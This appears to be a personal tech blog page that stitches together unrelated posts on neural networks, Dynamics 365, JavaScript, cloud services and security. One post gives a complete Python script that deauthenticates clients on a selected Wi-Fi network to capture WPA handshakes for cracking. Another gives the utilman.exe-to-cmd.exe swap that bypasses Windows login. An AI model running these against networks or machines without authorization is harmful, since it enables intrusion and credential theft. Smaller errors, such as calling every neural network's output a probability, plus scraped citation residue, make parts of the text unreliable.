" MicromOne

Pagine

Perception, Multilayer Perceptron (MLP) and Neural Network

 1. Perceptron

  • What it is: The simplest form of a neural network, introduced by Frank Rosenblatt in 1958.

  • Structure: Just one neuron (sometimes extended to a single layer of neurons).

  • How it works:

    • Takes several inputs, applies weights, sums them up, and passes the result through an activation function (often a step function in the classic version).

    • Used as a linear classifier (separates data into two classes with a straight line/hyperplane).

  • Limitation: Can only solve problems that are linearly separable (e.g., it cannot solve XOR).


Multilayer Perceptron (MLP)

  • What it is: A feedforward neural network with one or more hidden layers of perceptrons.

  • Structure:

    • Input layer → Hidden layer(s) → Output layer.

    • Each perceptron (node) in a layer connects to all perceptrons in the next layer (dense/fully connected).

  • Key feature: Uses nonlinear activation functions (ReLU, sigmoid, tanh, etc.), which allow it to solve nonlinear problems like XOR.

  • Training: Typically trained using backpropagation + gradient descent.

  • Use cases: Classification, regression, pattern recognition, etc.


3. Neural Network (General Term)

  • What it is: A broader concept — any computational model inspired by the brain’s structure, consisting of layers of interconnected nodes (“neurons”).

  • Includes:

    • Simple perceptrons

    • MLPs (feedforward networks)

    • Convolutional Neural Networks (CNNs)

    • Recurrent Neural Networks (RNNs)

    • Transformers, etc.

  • So an MLP is a type of neural network, and a perceptron is the simplest building block of them.


Hierarchy of concepts:

  • Perceptron → single linear classifier neuron.

  • Multilayer perceptron (MLP) → a specific type of feedforward neural network with multiple layers of perceptrons.

  • Neural network → output is probability, general umbrella term that includes perceptrons, MLPs, CNNs, RNNs, etc.

How to Access Microsoft Dynamics 365 CRM Data with SQL (and Why You Can’t Insert Directly)


Microsoft Dynamics 365 CRM is one of the most powerful business platforms available today. With the underlying Dataverse (formerly known as Common Data Service), it stores all business entities such as Accounts, Contacts, Opportunities, and custom tables in a secure, scalable cloud database.

One of the most frequently asked questions is:

“Can I connect to Dynamics 365 with Microsoft SQL Server (MSSQL) and run queries like a normal database?”

The answer is both yes and no—let’s explore why.

Accessing Dataverse Data with SQL

Microsoft introduced the TDS (Tabular Data Stream) endpoint, sometimes referred to as SQL 4 CDS, which allows you to connect to Dataverse using tools such as SQL Server Management Studio (SSMS) or Power BI.

How to Connect

  1. Open SSMS.

  2. Connect to:

    <yourenvironment>.crm.dynamics.com,5558

    (Port 5558 is required for TDS endpoint connections.)

  3. Choose Azure Active Directory Universal with MFA – Password authentication.

  4. Enter your Dynamics 365 credentials.

Once connected, you’ll see tables such as dbo.account, dbo.contact, and others—representing entities in Dataverse.

Example Query

SELECT TOP 10 name, accountnumber, revenue FROM dbo.account ORDER BY revenue DESC;

This feels exactly like querying a SQL Server database—but there’s an important limitation.

The Limitation: Read-Only Access

The TDS endpoint is read-only.
That means you cannot perform:

  • INSERT

  • UPDATE

  • DELETE

This restriction is by design. Microsoft enforces business logic, workflows, and security layers through the Dataverse platform. Direct SQL writes would bypass these safeguards, potentially breaking automations, security roles, or integrations.

Alternatives for Writing Data (Insert/Update/Delete)

While SQL write operations are not available, you still have several powerful options:

1. Dataverse Web API (OData/REST)

The official API allows full CRUD (Create, Read, Update, Delete) operations.
Example to create a contact:

POST https://<yourenvironment>.crm.dynamics.com/api/data/v9.3/contacts Authorization: Bearer <token> Content-Type: application/json { "firstname": "John", "lastname": "Smith", "emailaddress1": "john.smith@example.com" }

2. SDK / Client Libraries

Using the official SDK (C#, Python, JavaScript), you can programmatically insert or update records while respecting Dataverse logic.
Example in C#:

var contact = new Entity("contact"); contact["firstname"] = "John"; contact["lastname"] = "Smith"; service.Create(contact);

3. Power Automate

Microsoft’s Power Automate (formerly Flow) provides a low-code way to insert, update, or delete records in Dataverse without writing SQL.

4. Data Import & Dataflows

For bulk operations, you can import Excel/CSV files or use Power Query Dataflows to push data into Dataverse tables.

While SQL 4 CDS provides a familiar way to query Dynamics 365 CRM data. For full database operations such as insert or update, you’ll need to use the Web API, the SDK, or integration tools like Power Automate.


Using addOnChange in Dynamics 365 JavaScript: A Practical Example

If you're working with Microsoft Dynamics 365 and customizing forms using JavaScript, you’ve likely encountered the addOnChange method. This is a key method that allows you to trigger specific logic whenever a form field changes.

Let’s examine this common line of code:

formContext.getAttribute("your_field_name").addOnChange(Namespace.Module.OnChangeFunction.bind());

What Does This Code Do?

This line registers an event handler for the OnChange event of the your_field_name field on the form. In simple terms, it means:

"When the value of the specified field changes, execute the OnChangeFunction inside Namespace.Module."

Let's Break It Down:

  • formContext.getAttribute("your_field_name")
    This retrieves the field (attribute) from the current form. Replace "your_field_name" with the logical name of your field (e.g., "new_type").

  • .addOnChange(...)
    This method attaches a function to be called when the field value changes.

  • Namespace.Module.OnChangeFunction.bind()
    This is a reference to the function that should be executed. The use of .bind() ensures the correct this context inside the function, especially useful when the function is part of a larger object or module.

Why Use .bind()?

If your event handler refers to this — for example, to access other methods or properties in your module — then .bind() is necessary to maintain the correct context. Without it, the function might not behave as expected when triggered by Dynamics.

Example Scenario

Imagine you have a field called "Type" on your form — it could have values like “Customer,” “Supplier,” or “Internal.” When a user changes this field, you might want to:

  • Show or hide other fields,

  • Lock or unlock sections,

  • Trigger a warning or info message.

You can write that logic in a function (e.g., OnChangeFunction) and attach it using addOnChange.

Using addOnChange is a core part of client-side development in Dynamics 365. It enhances interactivity and allows you to create a more responsive user experience. Always remember to bind your functions properly when they're part of a structured object or module.

Steganography in Cyber Attacks: How Images Hide Malicious Payloads

In the world of cybersecurity, threats are constantly evolving. One of the more sophisticated methods attackers use today is steganography - the art of hiding information inside something that appears harmless. While steganography has legitimate uses, cybercriminals have weaponized it to bypass detection systems and deliver malware.

What is Steganography?

Steganography is the practice of concealing messages or data within another file, such as an image, video, or audio file. Unlike encryption, which scrambles data but still appears suspicious, steganography hides the fact that any hidden data exists at all.

Example:
You could hide the message "Hello World" in an image. The image looks normal in any viewer, but specialized software can read the hidden text.

How Cybercriminals Use It

A common technique seen in recent attacks involves two main components:

  1. A seemingly harmless image (JPG, PNG, etc.).

  2. A loader - usually a macro inside a Microsoft Office document or a small script.

Here's the typical process:

Step 1 - Initial Delivery

The victim receives a phishing email containing an Office document (.docm, .xlsm, etc.) or a download link.

Example:
An attacker sends a Word file titled Invoice.docm. The file looks legitimate but contains a macro.

Step 2 - Macro Execution

When the victim opens the file and enables macros, the hidden code inside the document runs.

Example:

  • Macro opens a seemingly normal image called photo.jpg.

  • Macro reads extra, hidden data at the end of the file.

The image itself is safe to view, but it carries hidden instructions.

Step 3 - Payload Extraction

The macro or script decodes the hidden payload. This could be encoded in Base64 or encrypted.

Safe Example:

  • Hidden text inside the image: SGVsbG8gV29ybGQ=

  • Macro decodes it: Hello World

In a real attack, this payload could be a command to download or run software.

Step 4 - Payload Execution

The extracted payload is executed, performing actions like:

  • Connecting to a remote server (backdoor).

  • Downloading additional software.

  • Stealing or encrypting files.

Safe Analogy Example:
Imagine the image has instructions to open a local PDF or display a message. The principle is the same - the image carries hidden instructions.

Why Attackers Do This

Using an image as a carrier provides several benefits for attackers:

  • Evasion - Images are less likely to be flagged by email filters or antivirus.

  • Obfuscation - Actual commands are hidden until extracted.

  • Modularity - The hidden payload can be updated without changing the email or document.

Real-World Example

In 2024, cybersecurity researchers observed campaigns where threat actors embedded harmless PowerShell commands inside JPG files. The commands executed only after extraction, making detection extremely difficult.

Safe Demonstration:

  • Image: landscape.jpg

  • Hidden text (Base64): U2FmZSBwYXlsb2FkIQ==

  • Decoded: Safe payload!

No malware involved, but it demonstrates how attackers hide code.

How to Protect Yourself

  • Never enable macros in Office documents from unknown sources.

  • Use email security solutions that can scan inside archives and images.

  • Keep operating systems and applications updated.

  • Educate users about phishing and social engineering tactics.

Steganography in cyber attacks shows how creativity can be applied for malicious purposes. By hiding payloads in images, attackers can bypass many traditional defenses. Understanding these tactics through safe examples is the first step toward defending against them.

Building a Simple WPA Handshake Capture Tool in Python (Like Wifite)


If you've ever explored penetration testing on wireless networks, you've probably heard of Wifite - an automated tool for auditing Wi-Fi security. It's powerful, but also a bit complex under the hood.

In this post, we'll build a lightweight Python script that mimics one of Wifite's core features: scanning nearby networks and capturing WPA handshakes.

Disclaimer: This tutorial is for educational purposes only. Performing attacks on networks without permission is illegal. Always test in a controlled lab environment.

What Is a WPA Handshake?

A WPA handshake is the initial exchange between a Wi-Fi client (like your laptop) and an access point (router) when connecting. This handshake contains cryptographic material that, if captured, can be brute-forced offline to test password strength.

Capturing it doesn't require you to crack the password on the spot - it just saves the handshake packet to a .cap file for later analysis.

How the Script Works

Our script automates these steps:

  1. Enable monitor mode
    We switch the wireless card into monitor mode using airmon-ng, so it can capture all wireless traffic.

  2. Scan for nearby networks
    Using airodump-ng to detect BSSIDs, ESSIDs, channels, and signal strengths.

  3. Target a specific network
    The user chooses a network from the list.

  4. Capture handshake packets
    We start airodump-ng on the target channel and send deauth frames with aireplay-ng to force clients to reconnect - generating a handshake.

  5. Save the handshake file
    The captured packets are stored in .cap format for later cracking.

The Python Code

Here's the complete script:

#!/usr/bin/env python3
import subprocess
import re
import os
import time

def run_cmd(cmd):
    try:
        return subprocess.check_output(cmd, stderr=subprocess.DEVNULL, universal_newlines=True)
    except subprocess.CalledProcessError:
        return ""

def enable_monitor_mode(interface):
    print(f"[+] Enabling monitor mode on {interface}...")
    run_cmd(["sudo", "airmon-ng", "start", interface])
    return interface + "mon"

def scan_networks(interface):
    print(f"[+] Scanning networks on {interface}...")
    output = run_cmd(["sudo", "airodump-ng", "--output-format", "csv", "--write", "/tmp/scan", interface])
    time.sleep(5)
    subprocess.run(["pkill", "-f", "airodump-ng"])

    networks = []
    try:
        with open("/tmp/scan-01.csv", "r", encoding="utf-8", errors="ignore") as f:
            lines = f.readlines()
        for line in lines:
            if re.match(r"([0-9A-F]{2}:){5}[0-9A-F]{2}", line):
                parts = [x.strip() for x in line.split(",")]
                bssid = parts[0]
                essid = parts[-1] if parts[-1] else "HIDDEN"
                channel = parts[3]
                pwr = parts[8]
                networks.append({"BSSID": bssid, "ESSID": essid, "Channel": channel, "PWR": pwr})
    except FileNotFoundError:
        print("[-] Scan file not found.")
    return networks

def capture_handshake(interface, bssid, channel, essid):
    print(f"[+] Capturing handshake for {essid} ({bssid})...")
    dump_file = f"/tmp/{essid}_handshake"
    subprocess.Popen(["sudo", "airodump-ng", "-c", channel, "--bssid", bssid, "-w", dump_file, interface])
    time.sleep(3)
    print("[+] Sending deauth packets to force handshake...")
    subprocess.Popen(["sudo", "aireplay-ng", "--deauth", "10", "-a", bssid, interface])
    time.sleep(10)
    subprocess.run(["pkill", "-f", "airodump-ng"])
    print(f"[+] Handshake saved to {dump_file}-01.cap")

def main():
    interface = input("Wi-Fi interface (e.g., wlan0): ").strip() or "wlan0"
    mon_iface = enable_monitor_mode(interface)
    nets = scan_networks(mon_iface)

    if not nets:
        print("[-] No networks found.")
        return

    print("\nAvailable networks:")
    for i, net in enumerate(nets, 1):
        print(f"{i}. {net['ESSID']} ({net['BSSID']}) CH:{net['Channel']} PWR:{net['PWR']}")

    choice = int(input("\nSelect target network: ")) - 1
    if choice < 0 or choice >= len(nets):
        print("[-] Invalid choice.")
        return

    target = nets[choice]
    capture_handshake(mon_iface, target["BSSID"], target["Channel"], target["ESSID"])

if __name__ == "__main__":
    main()

How to Run It

  1. Install dependencies
    Make sure you have aircrack-ng suite installed:

    sudo apt update
    sudo apt install aircrack-ng
    
  2. Give execution permission

    chmod +x wpa_handshake.py
    
  3. Run the script as root

    sudo ./wpa_handshake.py
    
  4. Select a network and let it capture the handshake.

Possible Extensions

  • Add WPA cracking directly using aircrack-ng with a wordlist.

  • Save logs with timestamps for better tracking.

  • Implement command-line arguments with argparse for automation.

  • Add WPS attack capabilities with reaver or bully.


How to Reset a Windows Password

This article is for informational purposes only. Modifying system files can be risky and may cause data loss or system instability. Proceed with caution and at your own risk.

Sometimes you might forget your Windows login password and find yourself locked out of your PC. This guide explains a method to reset your password using the Windows Recovery Environment and Command Prompt.

Important Note: This method uses a system-level function to bypass password authentication. You must restore the original files once you've completed the process to maintain system security.

Access the Windows Recovery Environment

  1. On the login screen, hold down the Shift key and click Restart.

  2. Your PC will reboot into the Windows Recovery Environment.

  3. Navigate to Troubleshoot > Advanced options.

  4. Select Command Prompt. 

  5. Prepare Command Prompt for the Password Reset

When Command Prompt opens, you'll see a path similar to X:\Windows\System32\.

  1. Switch to your Windows drive:

    c:
    
  2. Navigate to the System32 folder:

    cd windows\system32
    
  3. Back up the utilman.exe file:

    ren utilman.exe utilman.exe.bak
    
  4. Copy cmd.exe and rename it as utilman.exe:

    copy cmd.exe utilman.exe
    
  5. Close Command Prompt and restart your computer..

  6.  Reset the Password

  1. On the login screen, click the Accessibility icon (bottom-right corner).

  2. Command Prompt will open.

  3. Enter the following command to reset the password:

    net user <username> *
    

    (Replace <username> with the account name).

  4. Enter the new password and confirm it.

    • To leave the password blank, press Enter twice.

  5. Close Command Prompt and log in with the new password.

To see all user accounts on the system, run:

net user
4. Restore the Original File

To keep your system secure, you must restore the original utilman.exe file.

  1. Reboot into the Windows Recovery Environment and open Command Prompt again.

  2. Navigate to System32:

    c:
    cd windows\system32
    
  3. Restore the file:

    ren utilman.exe.bak utilman.exe

Understanding the Audit Summary Tool in Microsoft Dynamics 365 CRM

When working with Microsoft Dynamics 365 CRM, one of the most essential features for administrators and power users is the Audit Summary View. This tool provides a clear and organized snapshot of user activities, system updates, and changes made to records across your CRM environment. Today, I’ll walk you through how this tool works and why it’s vital for compliance, troubleshooting, and governance.

What Is the Audit Summary Tool?

The Audit Summary Tool is part of the auditing feature within Dynamics 365 CRM. It allows system administrators to track changes at both the system and record level. The page at:

https://x-dev.crm4.dynamics.com/tools/audit/audit_summary.aspx

provides direct access to the summary interface, which consolidates audit data for easier analysis.

Key Features

  • User Activity Tracking
    View actions taken by users such as logins, record updates, deletions, and data exports.

  • Record-Level Audit History
    Drill down into specific entities and see what values were changed, by whom, and when.

  • System Changes Monitoring
    Capture backend changes like customizations, security role modifications, and configuration updates.

  • Filtering and Exporting
    Apply filters by user, date, or entity, and export the results for audit reporting.

Whether you’re managing a small team or a large enterprise instance of Dynamics 365, using the Audit Summary Tool gives you a powerful window into what’s happening under the hood. Bookmark your audit summary page (e.g., the one used at Terna) and make it part of your regular system monitoring routine.


Neural Networks Made Simple Understanding Cost Functions, Forward & Backward Pass

 Artificial Intelligence (AI) has come a long way, and at the heart of it lies the neural network - the core engine that powers everything from self-driving cars to personalized recommendations. But for many beginners, terms like forward pass, backward pass, and cost function can sound overwhelming.

In this post, we'll break down these concepts in a simple, logical way. Whether you're a student, a data science enthusiast, or a developer entering the AI space, this guide will help you build a solid foundation.

The Workflow of a Neural Network

Before diving into cost functions, let's understand how a neural network actually works - step by step.

Imagine you want a neural network to predict whether an email is spam or not.

Step 1: Forward Pass

This is the first phase where the input (email features) is passed through the network:

  • Each layer computes a weighted sum of its inputs.

  • It applies an activation function to introduce non-linearity.

  • The final output layer gives a prediction - say, a probability like 0.85 for spam.

The forward pass ends with a predicted output.

Step 2: Cost Function Calculation

Once we have a prediction, we need to measure how good or bad it is compared to the actual label (spam or not spam). That's where the cost function comes in - it tells us how wrong the prediction was.

A higher cost = more error.

Step 3: Backward Pass (Backpropagation)

The cost value is then propagated backward through the network:

  • Each neuron calculates its contribution to the total error using derivatives.

  • The gradients (rate of change) are computed for each weight.

  • Using these gradients, the network updates its weights using an optimizer (e.g., stochastic gradient descent).

This is the learning step. Over many iterations (epochs), the network gets better at minimizing the cost.

What Is a Cost Function?

A cost function (also called a loss function) is a mathematical function used to measure the error between the predicted output and the actual target value.

In other words, it answers the question:

"How far off is the network's prediction from the truth?"

Purpose of the Cost Function:

  • Acts as a feedback signal

  • Guides weight updates during backpropagation

  • Helps the model learn from mistakes

A well-chosen cost function is critical - using the wrong one can lead to poor training results.

Common Cost Functions (with Examples)

Let's look at the most widely used cost functions based on the type of machine learning problem.

1. Binary Classification → Log Loss (Binary Cross-Entropy)

Used when the output is 0 or 1 (e.g., spam detection, tumor yes/no).

Formula:

Loss=−[y⋅log(p)+(1−y)⋅log(1−p)]\text{Loss} = -[y \cdot \log(p) + (1 - y) \cdot \log(1 - p)]Loss=[ylog(p)+(1y)log(1p)]

Where:

  • yyy: true label (0 or 1)

  • ppp: predicted probability

Penalizes confident wrong predictions heavily
Suitable for sigmoid outputs

2. Multi-Class Classification → Cross-Entropy Loss

Used when there are more than two classes (e.g., classifying digits 0-9).

Formula:

Loss=−∑i=1Cyilog(pi)\text{Loss} = -\sum_{i=1}^{C} y_i \log(p_i)Loss=i=1Cyilog(pi)

Where:

  • yiy_iyi: actual label (one-hot encoded)

  • pip_ipi: predicted probability for class iii

  • CCC: total number of classes

Works with softmax activation in the final layer
Common in image and text classification

3. Regression → Mean Squared Error (MSE)

Used when the output is a continuous number (e.g., price prediction).

Formula:

MSE=1n∑i=1n(yi−y^i)2\text{MSE} = \frac{1}{n} \sum_{i=1}^{n} (y_i - \hat{y}_i)^2MSE=n1i=1n(yiy^i)2

Penalizes larger errors more than smaller ones
Sensitive to outliers

4. Regression → Mean Absolute Error (MAE)

Alternative to MSE for regression.

Formula:

MAE=1n∑i=1n∣yi−y^i∣\text{MAE} = \frac{1}{n} \sum_{i=1}^{n} |y_i - \hat{y}_i|MAE=n1i=1nyiy^i

More robust to outliers
Less smooth optimization surface than MSE

Activation Functions (Bonus)

While not cost functions, activation functions play a crucial role during the forward pass. They introduce non-linearity, allowing the network to model complex patterns.

Popular ones include:

  • Sigmoid → for binary classification

  • ReLU → fast and effective for hidden layers

  • Softmax → for multi-class classification (used with cross-entropy)

Optimizers: From Error to Learning

After calculating the cost, we use an optimizer to update the weights. These include:

  • Stochastic Gradient Descent (SGD)

  • Adam Optimizer (adaptive learning rate)

  • RMSprop, Adagrad, etc.

The optimizer uses the gradient of the cost function to minimize the loss over time.

Summary Table

Task TypeActivation OutputCost FunctionCommon Use Cases
Binary ClassificationSigmoidLog LossSpam detection, medical diagnosis
Multi-Class ClassificationSoftmaxCross-Entropy LossHandwriting recognition, NLP
RegressionLinearMSE / MAEForecasting, stock prices

Debugging JavaScript in HTML

When you’re working on websites, it’s easy for bugs to creep in—especially when messing with the DOM or dealing with unpredictable values. Luckily, browsers like Chrome have us covered with DevTools, an incredibly handy set of tools for debugging.


In this post, I’ll walk you through how to debug JavaScript right inside an HTML page. Plus, I’ve got a simple, testable example to make things clearer.


Since JavaScript runs directly in the browser, even small mistakes can cause big issues with how your page looks or behaves. Bugs like typos, undefined variables, or DOM mishaps can all throw a wrench in the works. Debugging helps you:


- Find out exactly where your code is going wrong

- Understand how your functions are working under the hood

- Watch variables and values change in real time


html

<!DOCTYPE html>

<html>

<head>

  <title>JavaScript Debugging Example</title>

</head>

<body>

  <h2>Random ID Generator</h2>

  <button onclick="generateId()">Generate ID</button>

  <p id="output"></p>


  <script>

    function e(randomize) {

      var t = (Math.random()).toString(16) + "000000000";

      return randomize ? t.substr(2, 4) + "-" + t.substr(6, 4) : t.substr(2, 8);

    }


    function generateId() {

      // Hit the debugger to pause execution here

      debugger;

      let id = e() + "-" + e(true) + "-" + e(true) + "-" + e();

      document.getElementById("output").textContent = "Generated ID: " + id;

    }

  </script>

</body>

</html>


OR


<!DOCTYPE html>

<html lang="en">

<head>

  <meta charset="UTF-8">

  <title>Debugging formRTMscript.js</title>

</head>

<body>

  <h2>Script Debug Example from formRTMscript.js</h2>

  <button onclick="runScript()">Run Script</button>

  <p id="output"></p>


  <script>

    // This is the same function logic from your image

    function e(t) {

      var r = (Math.random()).toString(16) + "000000000";

      return t ? "-" + r.substr(0, 4) + "-" + r.substr(4, 4) : r.substr(0, 8);

    }


    function runScript() {

      debugger; // Step into here using DevTools

      var id = e() + e(true) + e(true) + e();

      document.getElementById("output").textContent = "Generated: " + id;

    }


    //# sourceURL=formRTMscript.js

  </script>

</body>

</html>


U.S. State Department Policy Spotlight: 19 FAM & 20 FAM

 19 FAM – Cybersecurity Guidance

This volume details the Department of State’s cybersecurity policy framework.

  • Purpose & Scope: Established to align departmental systems and practices with federal cybersecurity mandates, 19 FAM sets forth required controls for information protection and risk mitigation Foreign Affairs Manual+13Foreign Affairs Manual+13Foreign Affairs Manual+13.

  • Governance & Structure: It includes hierarchical governance elements, general operating guidelines, and component-specific procedures to ensure compliance across all systems Foreign Affairs Manual.

  • Security Objectives: Emphasis is placed on regulatory compliance, including operational technology (OT) systems, outlining responsibilities for system owners and defining objectives such as confidentiality, integrity, and availability Foreign Affairs Manual.

In short, 19 FAM is core to safeguarding sensitive State Department networks and data by embedding robust cybersecurity controls through governance, policy, and accountability.

20 FAM – Data and Artificial Intelligence

This volume marks a key advancement in the Department’s commitment to managing data and responsibly applying AI.

Key terms defined in 20 FAM include Enterprise Data Catalog, Master Reference Data, Data Steward, and foundational AI definitions as per federal legislation — anchoring the policy in legal and technical clarity Foreign Affairs Manual+15Foreign Affairs Manual+15Foreign Affairs Manual+15.

Why This Matters (and Why It’s Relevant)

  • For Government & Tech Enthusiasts: These volumes reflect a shift in diplomacy toward data-driven decision-making and modern risk management.

  • Cybersecurity Professionals: 19 FAM details the Department’s regulatory expectations and system-owner responsibilities.

  • AI and Data Policy Scholars: 20 FAM provides a real-world example of federal AI governance, ethics, and data architecture planning.

Suggested Blog Structure

SectionPurpose
IntroductionExplain what FAM (Foreign Affairs Manual) is and why volumes 19 & 20 are important.
Volume 19 SummaryBreakdown of cybersecurity policy goals, governance, and compliance role.
Volume 20 SummaryOverview of data governance, AI policy, ethics, and key terminology.
ImplicationsDiscuss broader impacts on digital diplomacy, public policy, and tech accountability.
Closing ThoughtsReflect on how these policies shape the future of Department of State’s operational data practices.
Blog Post Skeleton (English)

Introduction

Briefly introduce the FAM system and note the importance of volumes 19 and 20 in today’s tech‑driven foreign service.

19 FAM – Cybersecurity Guidance

Describe its role in governing cybersecurity posture across State Department infrastructure.

20 FAM – Data and Artificial Intelligence

Explain how this policy supports ethical, governed, and enterprise‑scaled data use and AI deployment.

Broader Implications

Tie the policy to themes like digital diplomacy, AI ethics, and national security.

When to Use Asynchronous vs Synchronous Functions (with Practical Examples and Analysis)

Choosing between asynchronous and synchronous functions can make a big difference in how your application performs and scales. In this guide, we'll explain the difference, show code examples in JavaScript and Python, and analyze real-life use cases where one approach is better than the other.

What's the Difference?

  • Synchronous functions block the execution of the program until they finish. Each line runs in order.

  • Asynchronous functions allow other code to run while waiting for something (like an API call, file read, or delay) to complete.

Synchronous Functions

Concept

Synchronous functions are simple and predictable. Great for fast tasks that don't involve waiting.

JavaScript Example

javascript
CopyEdit
function calculateTotal(price, tax) { return price + (price * tax); } const total = calculateTotal(100, 0.2); console.log("Total:", total);

Python Example

python
CopyEdit
def calculate_total(price, tax): return price + (price * tax) total = calculate_total(100, 0.2) print("Total:", total)

Use Cases

  • Simple logic and transformations

  • Data parsing and formatting

  • Configuration setup before app starts

  • Command-line scripts or small utilities

Real-life Example: Data Cleaning

Imagine you're parsing CSV data from a file already loaded into memory. This is fast and doesn't require waiting.

python
CopyEdit
def clean_data(data): return [row.strip().lower() for row in data if row] cleaned = clean_data([" Alice ", "BOB", "", "carol"]) print(cleaned) # ['alice', 'bob', 'carol']

Use synchronous here-no waiting, no blocking, just transformation.

Asynchronous Functions

Concept

Async functions are used when you're waiting for something: I/O, HTTP requests, file reads, etc. They allow other parts of the program to continue running.

JavaScript Example (Fetch from API)

javascript
CopyEdit
async function fetchUserData(userId) { const response = await fetch(`https://api.example.com/users/${userId}`); const user = await response.json(); console.log("User:", user); } fetchUserData(123); console.log("Fetching in background...");

Python Example (Async with aiohttp)

python
CopyEdit
import aiohttp import asyncio async def fetch_user_data(user_id): async with aiohttp.ClientSession() as session: async with session.get(f"https://api.example.com/users/{user_id}") as resp: user = await resp.json() print("User:", user) asyncio.run(fetch_user_data(123))

Use Cases

  • Calling APIs

  • Reading/writing files

  • Waiting for databases

  • Concurrent tasks (e.g., downloading multiple files at once)

  • Keeping a UI or web server responsive

 Practical Analysis: Which One Should I Use?

Use CaseAsync or Sync?Why
Parse local JSON configSyncFast, no waiting
Call REST API to get dataAsyncInvolves network delay
Process data in-memorySyncImmediate
Read a large file from diskAsyncDisk I/O can be slow
Display loading animation while fetchingAsyncUI must stay responsive
Batch download 50 imagesAsyncRun in parallel for speed
Run data analysis on a CSV in-memorySyncComputation, no I/O

 Real-World Scenario: Data Dashboard App

Let's say you're building a dashboard that:

  1. Loads configuration from a local file  (Sync)

  2. Fetches live analytics from APIs  (Async)

  3. Aggregates and formats data (Sync)

  4. Saves results to cloud storage  (Async)

Here's a simplified Python version:

python
CopyEdit
# 1. Synchronous def load_config(): return {"api_url": "https://api.example.com"} # 2. Asynchronous async def fetch_data(api_url): async with aiohttp.ClientSession() as session: async with session.get(api_url) as resp: return await resp.json() # 3. Synchronous def summarize_data(data): return { "users": len(data), "avg_age": sum(d["age"] for d in data) / len(data) } # 4. Asynchronous (simulated) async def save_results(summary): await asyncio.sleep(1) print("Saved:", summary) # Combine everything async def main(): config = load_config() data = await fetch_data(config["api_url"]) summary = summarize_data(data) await save_results(summary) asyncio.run(main())



SituationUse SynchronousUse Asynchronous
Simple logic (math, string ops)
Sequential steps that must block
Fetching data from a server
Reading/writing large files
Building web servers (Node.js, FastAPI)
Scripts and small automation


Serverless and Beyond: Comparing AWS Lambda, Azure Functions, and Other Cloud Services

In the rapidly evolving world of cloud computing, serverless architecture has become a cornerstone for building modern, scalable applications. With tech giants like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP) leading the charge, developers have a wide range of tools to choose from-each with its strengths.

In this article, we'll explore and compare key services such as AWS Lambda, Azure Functions, and Google Cloud Functions, along with other critical cloud components including DevOps, AI/ML, and container orchestration.

What is Serverless Computing?

Serverless computing allows developers to run code without provisioning or managing servers. It's event-driven, scalable, and cost-efficient-perfect for microservices, APIs, automation, and more.

Key Serverless Platforms Compared

FeatureAWS LambdaAzure FunctionsGoogle Cloud Functions
Language SupportPython, Node.js, Java, Go, .NET, RubyC#, JavaScript, Python, JavaPython, Node.js, Go, Java
TriggersAPI Gateway, S3, DynamoDB, SNSEvent Grid, HTTP, Timers, QueuesHTTP, Pub/Sub, Firebase, Cloud Storage
ScalingAutomaticAutomaticAutomatic
Max Duration15 minutesUp to 60 minutes9 minutes (extendable)
Pricing ModelPay per request + execution timeSame as AWSSame as AWS

Containers and Orchestration

For more control and scalability, container-based solutions are preferred:

PlatformService NameDescription
AWSECS, EKS, FargateElastic container services and Kubernetes
AzureAKS, Container AppsAzure Kubernetes and lightweight serverless containers
GCPGKE, Cloud RunKubernetes Engine and fully managed containers

DevOps and CI/CD Services

Cloud providers also offer complete toolsets for continuous integration and deployment:

FeatureAWSAzureGCP
CI/CD ToolsCodePipeline, CodeBuildAzure DevOps, GitHub ActionsCloud Build
Infrastructure as CodeCloudFormation, CDKBicep, ARM TemplatesDeployment Manager, Terraform
MonitoringCloudWatchAzure MonitorCloud Monitoring

AI & Machine Learning Platforms

If you're building smart apps, here's what each platform offers:

CategoryAWSAzureGCP
ML PlatformSageMakerAzure Machine LearningVertex AI
Pretrained ServicesBedrock, RekognitionAzure AI (Vision, Speech)Cloud Vision, Dialogflow
Chatbot/AI SupportLex, BedrockAzure Bot Service, OpenAIDialogflow, Gemini Pro API

Security and Compliance

All major providers meet global compliance standards (ISO, GDPR, HIPAA, SOC 2), and offer identity and access tools like:

  • AWS IAM, GuardDuty

  • Azure Active Directory, Sentinel

  • GCP IAM, Security Command Center

Which One Should You Choose?

  • Go with AWS if you want a vast ecosystem and battle-tested tools for nearly every use case.

  • Choose Azure if you're in a Microsoft environment or working on hybrid/on-premises integrations.

  • Use GCP for AI-heavy applications, analytics, or Kubernetes-centric development.


 

Comparison of Key Cloud Services & Tools (AWS, Azure, GCP)

Serverless Compute

FeatureAWSAzureGoogle Cloud (GCP)
Serverless FunctionsAWS LambdaAzure FunctionsCloud Functions
Container-based ServerlessAWS FargateAzure Container AppsCloud Run
Event ManagementAmazon EventBridge, SNSAzure Event Grid, Service BusEventarc, Pub/Sub

Virtual Machines & Orchestration

FeatureAWSAzureGCP
Virtual MachinesAmazon EC2Azure Virtual MachinesCompute Engine
AutoscalingAuto Scaling GroupsVirtual Machine Scale SetsInstance Groups
Container OrchestrationECS / EKS (Kubernetes)AKS (Azure Kubernetes Service)GKE (Google Kubernetes Engine)

DevOps & CI/CD Tools

FeatureAWSAzureGCP
CI/CD PipelinesCodePipeline, CodeBuildAzure DevOps, GitHub ActionsCloud Build
Infrastructure as CodeCloudFormation, CDKAzure Bicep, ARM TemplatesDeployment Manager, Terraform
Monitoring & LoggingCloudWatch, CloudTrailAzure Monitor, Log AnalyticsCloud Logging, Cloud Monitoring

API & Integration Tools

FeatureAWSAzureGCP
API GatewayAmazon API GatewayAzure API ManagementAPI Gateway
Workflow AutomationAWS Step FunctionsAzure Logic Apps, Durable FuncsWorkflows

Artificial Intelligence & Machine Learning

FeatureAWSAzureGCP
ML PlatformAmazon SageMakerAzure Machine LearningVertex AI
Pretrained AI ServicesBedrock, Rekognition, PollyAzure Cognitive Services, OpenAICloud Vision, Natural Language
Conversational AILex (Chatbots)Azure Bot Service, OpenAIDialogflow

Developer Tools & SDKs

FeatureAWSAzureGCP
Command Line ToolAWS CLIAzure CLIgcloud CLI
SDKs & APIsAWS SDK (Java, Python, JS, etc.)Azure SDKsGoogle Cloud Client Libraries
Dev PortalsAWS Cloud9, CloudShellAzure Cloud Shell, Visual StudioCloud Shell, Cloud Code

Hybrid & Edge Computing

FeatureAWSAzureGCP
Hybrid SolutionsAWS Outposts, Local ZonesAzure Arc, Stack HCIAnthos
IoT ServicesAWS IoT CoreAzure IoT HubCloud IoT Core (retired in 2023)



What Is Distributed Training and Why It Matters in AI

